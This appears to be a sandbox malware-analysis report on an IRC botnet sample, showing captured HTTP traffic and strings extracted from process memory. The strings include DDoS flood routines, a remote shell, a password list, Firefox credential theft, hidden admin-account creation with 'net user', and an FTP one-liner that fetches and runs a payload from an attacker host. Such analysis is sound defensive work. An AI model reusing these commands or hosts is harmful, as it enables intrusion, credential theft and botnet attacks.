Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 22 Mar 2014 11:18:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da6191e9b8143e8df9f92ef6df9da84231395487139700; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 10f1fddf2ba1072b-AMS
830..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:1395415713,byc:0,owlid:"cf",
bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/ne
xp/dok8v=02fcfa4f56/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"
fcb473feb94cd35c093199b4a1ab2d93b1ddb512-1395487139-1800",zone:"whatis
myip.com",rocket:"a",apps:{"ga_key":{"ua":"UA-4975660-1","ga_bs":"2"}}
}];document.write('<script type="text/javascript" src="//ajax.cloud
flare.com/cdn-cgi/nexp/dok8v=b064e16429/cloudflare.min.js"><' '\
/script>');}}catch(e){};.//]]>.</script>.<script type="
text/javascript">./* <![CDATA[ */.var _gaq = _gaq || [];._gaq.pu
sh(['_setAccount', 'UA-4975660-1']);._gaq.push(['_trackPageview']);..(
function() {.var ga = document.createElement('script'); ga.type = 'tex
t/javascript'; ga.async = true;.ga.src = ('https:' == document.locatio
n.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga
.js';.var s = document.getElementsByTagName('script')[0]; s.parentNode
.insertBefore(ga, s);.})();..(function(b){(function(a){"__CF"in b&&"DJ
S"in b.__CF?b.__CF.DJS.push(a):"addEventListener"in b?b.addEventListen
er("load",a,!1):b.attachEvent("onload",a)})(function(){"FB"in b&&"Even
t"in FB&&"subscribe"in FB.Event&&(FB.Event.subscribe("edge.create",fun
ction(a){_gaq.push(["_trackSocial","facebook","like",a])}),FB.Event.su
bscribe("edge.remove",function(a){_gaq.push(["_trackSocial","faceb

<<< skipped >>>

GET /uploads/1738599339.ms1.exe?dl=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: directxex.com


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sat, 22 Mar 2014 11:18:44 GMT
Content-Type: application/octet-stream
Content-Length: 528384
Connection: keep-alive
Set-Cookie: __cfduid=df99418797b08450fcf1ecb11625a82d61395487124792; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.directxex.com; HttpOnly
Last-Modified: Sat, 15 Mar 2014 01:21:10 GMT
ETag: "5323ab06-81000"
Expires: Mon, 21 Apr 2014 11:18:43 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
CF-RAY: 10f1fd81f37300de-AMS
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......W.x.........
............\.......%.......Rich............................PE..L.....
#S.....................P....................@...............X.........
.@..................................................(....0..@.........
..........................................................8... .......
.............................text...t........................... ..`.d
ata...h2..........................@....rsrc...@....0..................
....@..@l.[J............MSVBVM60.DLL..................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 107
<html><head><title>Current IP Check</title><
;/head><body>Current IP Address: 193.138.244.231</body>
</html>....


ooulnvm.exe_1592:

.text
`.rdata
@.data
_WSSh
t1SSSSh
PeekNamedPipe
CreatePipe
KERNEL32.dll
WS2_32.dll
GetCPInfo
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[DDoS]: Send error: <%d>.
ddos.random
ddos.ack
ddos.syn
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[UPDATE]: Update failed: Error executing file: %s.
[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Couldn't open file: %s.
[IDENTD]: Error: server failed, returned: <%d>.
: USERID : UNIX : %s
[IDENTD]: Client connection from IP: %s:%d.
%s %s :%s
PRIVMSG
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
videos.p0rn-lover.us
support.exe
Supports RAS Connections
g.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
winpass
sqlpassoainstall
databasepassword
databasepass
dbpassword
dbpass
domainpassword
domainpass
loginpass
login
windows
1234567890
123456789
12345678
1234567
pass1234
passwd
password
password1
*@fbi.edu
Ý %dh %dm
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[IDENTD]: Failed to start server, error: <%d>.
[IDENTD]: Server running on Port: 113.
%s %d "%s"
%s\%s
[MAIN]: Connected to %s.
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
[MAIN]: User: %s logged in.
[MAIN]: Password accepted.
[MAIN]: *Failed host auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
[MAIN]: Random nick change: %s
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s
ftp.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
[FTP]: File not found: %s.
[MAIN]: Invalid login slot number: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: %s
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[MAIN]: Uptime: %s.
[CMD]: Remote shell ready.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell already running.
[TFTP]: Failed to start server thread, error: <%d>.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Already running.
[MAIN]: Nick changed to: '%s'.
[MAIN]: Joined channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Stopped: %d thread(s).
[MAIN]: Prefix changed to: '%c'.
[SHELL]: Couldn't open file: %s
[SHELL]: File opened: %s
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[FILE]: Deleted '%s'.
[VISIT]: Failed to start connection thread, error: <%d>.
[VISIT]: URL: %s.
[CMD]: Commands: %s
[CMD]: Error sending to remote shell.
[MAIN]: Read file failed: %s
[MAIN]: Read file complete: %s
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Alias added: %s.
[MAIN]: Privmsg: %s: %s.
[MAIN]: Action: %s: %s.
PART %s
[MAIN]: Mode change: %s
MODE %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Nick (%s): %s
JOIN %s %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat: %s
%s %s %s :%s
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Downloading update from: %s.
%s%s.exe
[EXEC]: Commands: %s
[EXEC]: Couldn't execute file.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[%s] <%s> %s
[%s] * %s %s
ACTION %s
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[EMAIL]: Message sent to %s.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
udpflood
c_privmsg
. Failed to start flood thread, error: <%d>.
. Flooding: (%s:%s) for %s seconds.
ddos.supersyn
c_join
c_nick
privmsg
[IDENT]: Server stopped. (%d thread(s) stopped.)
mirccmd
c_rndnick
join
nick
tftp
tftpserver
[MAIN]: Login list complete.
%d. %s
-[Login List]-
[CMD]
cmdstop
ocmd
opencmd
[TFTP]
tftpstop
supersyn.stop
TCP redirect
rndnick
$rndnick
NOTICE %s :
PING %s
VERSION %s
[MAIN]: Joined channel: %s.
[MAIN]: User: %s logged out.
:%s%s
NICK
NOTICE %s :%s
[MAIN]: User %s logged out.
PONG %s
%s Error: %s <%d>.
explorer.exe
%%comspec%% /c %s %s
del "%s"
%sdel.bat
%d.%d.%d.%d
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
PRIVMSG %s :%s
[CMD]: Could not read data from proccess.
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Remote Command Prompt
cmd.exe
[%s]|
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
tftp.exe -i get
IP: %s
[TFTP]: Failed to open file: %s.
[TFTP]: Error: socket() failed, returned: <%d>.
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Invalid URL.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: URL visited.
zcÁ
[03-22-2014 13:18:45] [DOWNLOAD]: Opened: c:/windows/skype.exe.
ows/skype.exe @ 516.0 KB/sec.
.exe?dl=1 to: c:/windows/skype.exe[03-22-2014 13:18:45] [DOWNLOAD]: Downloaded 516.0 KB to c:/windows/skype.exe @ 516.0 KB/sec.
[03-22-2014 13:18:44] [MAIN]: Joined channel: #fkyou#.
[03-22-2014 13:18:44] [DOWNLOAD]: Downloading URL: http://directxex.com/uploads/1738599339.ms1.exe?dl=1 to: c:/windows/skype.ex
[03-22-2014 13:18:44] [MAIN]: Joined channel: #Security-Check.
[03-22-2014 13:18:44] [DOWNLOAD]: Downloading URL: ftp://upload:upload@178.33.232.15:8989/sys.exe to: c:/windows/bin.exe.
[03-22-2014 13:18:44] [MAIN]: Connected to videos.p0rn-lover.us.
[03-22-2014 13:17:57] [IDENTD]: Server running on Port: 113.
[DOWNLOAD]: Downloading URL: ftp://upload:upload@178.33.232.15:8989/sys.exe to: c:/windows/bin.exe.
DOWNLOAD]: File download: http://directxex.com/uploads/1738599339.ms1.exe?dl=1 (516KB transferred).
e.exe.
%System%\ooulnvm.exe
00000000000000

ooulnvm.exe_1592_rwx_00400000_0009C000:

.text
`.rdata
@.data
_WSSh
t1SSSSh
PeekNamedPipe
CreatePipe
KERNEL32.dll
WS2_32.dll
GetCPInfo
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[DDoS]: Send error: <%d>.
ddos.random
ddos.ack
ddos.syn
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[UPDATE]: Update failed: Error executing file: %s.
[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Couldn't open file: %s.
[IDENTD]: Error: server failed, returned: <%d>.
: USERID : UNIX : %s
[IDENTD]: Client connection from IP: %s:%d.
%s %s :%s
PRIVMSG
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
videos.p0rn-lover.us
support.exe
Supports RAS Connections
g.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
winpass
sqlpassoainstall
databasepassword
databasepass
dbpassword
dbpass
domainpassword
domainpass
loginpass
login
windows
1234567890
123456789
12345678
1234567
pass1234
passwd
password
password1
*@fbi.edu
Ý %dh %dm
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[IDENTD]: Failed to start server, error: <%d>.
[IDENTD]: Server running on Port: 113.
%s %d "%s"
%s\%s
[MAIN]: Connected to %s.
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
[MAIN]: User: %s logged in.
[MAIN]: Password accepted.
[MAIN]: *Failed host auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
[MAIN]: Random nick change: %s
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s
ftp.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
[FTP]: File not found: %s.
[MAIN]: Invalid login slot number: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: %s
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[MAIN]: Uptime: %s.
[CMD]: Remote shell ready.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell already running.
[TFTP]: Failed to start server thread, error: <%d>.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Already running.
[MAIN]: Nick changed to: '%s'.
[MAIN]: Joined channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Stopped: %d thread(s).
[MAIN]: Prefix changed to: '%c'.
[SHELL]: Couldn't open file: %s
[SHELL]: File opened: %s
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[FILE]: Deleted '%s'.
[VISIT]: Failed to start connection thread, error: <%d>.
[VISIT]: URL: %s.
[CMD]: Commands: %s
[CMD]: Error sending to remote shell.
[MAIN]: Read file failed: %s
[MAIN]: Read file complete: %s
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Alias added: %s.
[MAIN]: Privmsg: %s: %s.
[MAIN]: Action: %s: %s.
PART %s
[MAIN]: Mode change: %s
MODE %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Nick (%s): %s
JOIN %s %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat: %s
%s %s %s :%s
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Downloading update from: %s.
%s%s.exe
[EXEC]: Commands: %s
[EXEC]: Couldn't execute file.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[%s] <%s> %s
[%s] * %s %s
ACTION %s
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[EMAIL]: Message sent to %s.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
udpflood
c_privmsg
. Failed to start flood thread, error: <%d>.
. Flooding: (%s:%s) for %s seconds.
ddos.supersyn
c_join
c_nick
privmsg
[IDENT]: Server stopped. (%d thread(s) stopped.)
mirccmd
c_rndnick
join
nick
tftp
tftpserver
[MAIN]: Login list complete.
%d. %s
-[Login List]-
[CMD]
cmdstop
ocmd
opencmd
[TFTP]
tftpstop
supersyn.stop
TCP redirect
rndnick
$rndnick
NOTICE %s :
PING %s
VERSION %s
[MAIN]: Joined channel: %s.
[MAIN]: User: %s logged out.
:%s%s
NICK
NOTICE %s :%s
[MAIN]: User %s logged out.
PONG %s
%s Error: %s <%d>.
explorer.exe
%%comspec%% /c %s %s
del "%s"
%sdel.bat
%d.%d.%d.%d
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
PRIVMSG %s :%s
[CMD]: Could not read data from proccess.
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Remote Command Prompt
cmd.exe
[%s]|
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
tftp.exe -i get
IP: %s
[TFTP]: Failed to open file: %s.
[TFTP]: Error: socket() failed, returned: <%d>.
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Invalid URL.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: URL visited.
zcÁ
[03-22-2014 13:18:45] [DOWNLOAD]: Opened: c:/windows/skype.exe.
ows/skype.exe @ 516.0 KB/sec.
.exe?dl=1 to: c:/windows/skype.exe[03-22-2014 13:18:45] [DOWNLOAD]: Downloaded 516.0 KB to c:/windows/skype.exe @ 516.0 KB/sec.
[03-22-2014 13:18:44] [MAIN]: Joined channel: #fkyou#.
[03-22-2014 13:18:44] [DOWNLOAD]: Downloading URL: http://directxex.com/uploads/1738599339.ms1.exe?dl=1 to: c:/windows/skype.ex
[03-22-2014 13:18:44] [MAIN]: Joined channel: #Security-Check.
[03-22-2014 13:18:44] [DOWNLOAD]: Downloading URL: ftp://upload:upload@178.33.232.15:8989/sys.exe to: c:/windows/bin.exe.
[03-22-2014 13:18:44] [MAIN]: Connected to videos.p0rn-lover.us.
[03-22-2014 13:17:57] [IDENTD]: Server running on Port: 113.
[DOWNLOAD]: Downloading URL: ftp://upload:upload@178.33.232.15:8989/sys.exe to: c:/windows/bin.exe.
DOWNLOAD]: File download: http://directxex.com/uploads/1738599339.ms1.exe?dl=1 (516KB transferred).
e.exe.
%System%\ooulnvm.exe
00000000000000

skype.exe_1292:

.text
guard32.dll
sbiedll.dll
advapi32.dll
kernel32.dll

skype.exe_1292_rwx_00401000_00005000:

guard32.dll
sbiedll.dll
advapi32.dll
kernel32.dll

csrss.exe_268:

.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
ftp://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
jayne.p0rn-lover.us
rundat.exe
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%WinDir%\csrss.exe
193.138.244.231
192.168.220.133
231-ua-upclick.ipsystems.com.ua
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 50 threads.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.

csrss.exe_268_rwx_00400000_0005A000:

.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
ftp://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
